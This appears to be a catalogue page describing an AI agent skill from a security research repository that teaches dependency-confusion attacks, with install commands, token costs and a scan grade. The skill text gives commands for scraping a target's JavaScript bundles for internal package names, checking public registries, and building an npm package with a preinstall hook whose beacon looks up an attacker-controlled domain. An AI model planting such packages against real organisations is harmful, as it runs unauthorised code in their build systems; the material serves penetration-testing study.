Getting it into your agent
One page per mod, every tool's command on it. A separate URL per tool would split the same page into five that compete with each other.
npx skills add MingyiSecLab/Mingyi-Atlas --skill dep-confusiongit clone --depth 1 https://github.com/MingyiSecLab/Mingyi-AtlasWrote this? Show the measurements
A badge with what this costs and how it scanned, read live from this page, so it follows the numbers instead of freezing them. Markdown for a README, HTML for a documentation site or a project page.
[](https://agentmods.dev/skills/mingyiseclab/mingyi-atlas/dep-confusion)<a href="https://agentmods.dev/skills/mingyiseclab/mingyi-atlas/dep-confusion"><img src="https://agentmods.dev/badge/skills/mingyiseclab/mingyi-atlas/dep-confusion/github.svg" alt="Measured on agentmods" height="20"></a>Or the 80×15 button, for a site that already has a row of RSS and ATOM ones. Only the verdict fits; the numbers stay here.
<a href="https://agentmods.dev/skills/mingyiseclab/mingyi-atlas/dep-confusion"><img src="https://agentmods.dev/badge/skills/mingyiseclab/mingyi-atlas/dep-confusion.svg" alt="Reviewed on agentmods" width="80" height="20"></a>What it costs to keep this loaded
Counted locally with the o200k_base tokenizer, which is exact for GPT models; Claude uses its own tokenizer and its counts differ. Treat this as one consistent yardstick across the catalogue rather than a bill. Prices are per million input tokens.
| Model | Per session | Once invoked |
|---|---|---|
| Fable 5.1 | $0.00038 | $0.01415 |
| Opus 5 | $0.00019 | $0.00707 |
| Sonnet 5 | $0.00008 | $0.00283 |
| Haiku 4.5 | $0.00004 | $0.00142 |
Grade A, and why
dep-confusion scanned grade A with 1 finding against 26 rules in 11 categories — prompt injection, anti-refusal, data exfiltration, privilege escalation, supply chain, agent snooping, system-prompt leakage, SSRF and excessive agency — measured 9d ago.
A static scan of the body, not an audit. Every finding is printed with the line that produced it so you can judge whether it matters here. A mod is markdown that instructs an agent; that is exactly why what it instructs is worth reading.
Makes network callslowCapability
Not a fault in itself. Listed so you know the mod talks to something, and to what.
curl -s "$TARGET" | grep -oP 'src="[^"]*\.js"' | sort -u | while read js; do This is a copy
100% identical to dep-confusion — 0 lines differ, which has more behind it and is treated as the original. This page carries a canonical link to it rather than competing with it.
How it starts
The opening of the file, as written. The whole thing — 152 lines — stays where its author put it; the contents beside it link to each section on GitHub.
Dependency Confusion (Alex Birsan 2021)
When an org uses internal private packages (e.g. @target-internal/utils)
AND a build system that searches BOTH public + private registries, an
attacker can publish a public package w/ the same name at higher version.
Default resolvers pick highest version → public package runs in CI.
1. Reconnaissance — find internal package names
| Source | Pattern |
|---|---|
package.json in public repo |
"@target/foo" scoped packages |
package.json exfiltrated from web (/static/) |
dependency lists |
| Webpack bundles | leaked package.json strings |
requirements.txt / Pipfile exposure |
target-internal-lib |
pom.xml / build.gradle |
<groupId>com.target</groupId> |
| Github org code search | @scope patterns in user/org-owned repos (sometimes accidentally public) |
| Stack Overflow / Stack Exchange | engineers asking about internal libs |
| Sourcegraph public index | broad search across exposed orgs |
# Pull all JS bundle URLs from a target
curl -s "$TARGET" | grep -oP 'src="[^"]*\.js"' | sort -u | while read js; do
curl -s "$TARGET$js" | grep -oE '@[a-z0-9_-]+/[a-z0-9_-]+'
done | sort -u
2. Verify the package is private
# Check npm public
npm view @target/internal-utils 2>&1 | grep -E 'E404|not in this registry'
# E404 = name available publicly → confusion candidate
# PyPI
pip index versions target-internal-utils
# "ERROR: No matching distribution" = name available
# Maven Central via search
curl -s "https://search.maven.org/solrsearch/select?q=g:com.target+AND+a:internal-lib" | jq
If the name is taken publicly already, confusion path closed (unless you can take it over — check abandoned packages w/ no maintainer email).
3. Build the malicious package
mkdir attack-pkg && cd attack-pkg
# package.json
cat > package.json <<'EOF'
{
"name": "@target/internal-utils",
"version": "999.0.0",
"description": "auth-research only",
"scripts": {
"preinstall": "node beacon.js"
}
}
EOF
# beacon.js — DO NOT execute payload, just confirm install
cat > beacon.js <<'EOF'
const https = require('https');
const os = require('os');
const dns = require('dns');
// Resolve attacker-controlled subdomain to confirm execution
// Use Burp Collaborator / interactsh / your own DNS server
const subdomain = require('crypto').randomBytes(8).toString('hex');
dns.lookup(`${subdomain}.YOUR_INTERACT_DOMAIN`, () => {});
// Also collect basic env w/o exfil (just locally print for testing)
console.log({
hostname: os.hostname(),
user: os.userInfo().username,
platform: os.platform(),
hostname_dns: dns.getServers(),
});
EOF
What this file has done since we first saw it
Hashed on every crawl. A supply-chain change to an agent config is a question of when, not whether, so the history is kept rather than the latest state alone.
- 9d ago First seen · 152 lines · 38 tokens per session scan A 837d3193c5f0
dep-confusion is a skill published in the GitHub repository MingyiSecLab/Mingyi-Atlas (11 stars, last pushed 2mo ago), licensed Apache-2.0. It adds 38 tokens to every session and 1,415 once invoked, about $0.0002 per session on Opus 5. A static security scan graded it A with 1 finding (makes network calls). It is 100% identical to dep-confusion, differing in 0 lines, and is treated as a copy.
Other skills, from other repositories
cis-aws-foundations-6.5
Ensure the default security group of every VPC restricts all traffic.
cis-aws-foundations-4.3
Ensure AWS Config is enabled in all regions.
cis-aws-foundations-2.1.3
Ensure Organizations management account is not used for workloads.
cis-aws-foundations-2.5
Ensure MFA is enabled for the 'root' user account.
cis-aws-foundations-2.7
Eliminate use of the 'root' user for administrative and daily tasks.
cis-aws-foundations-4.4
Ensure that server access logging is enabled on the CloudTrail S3 bucket.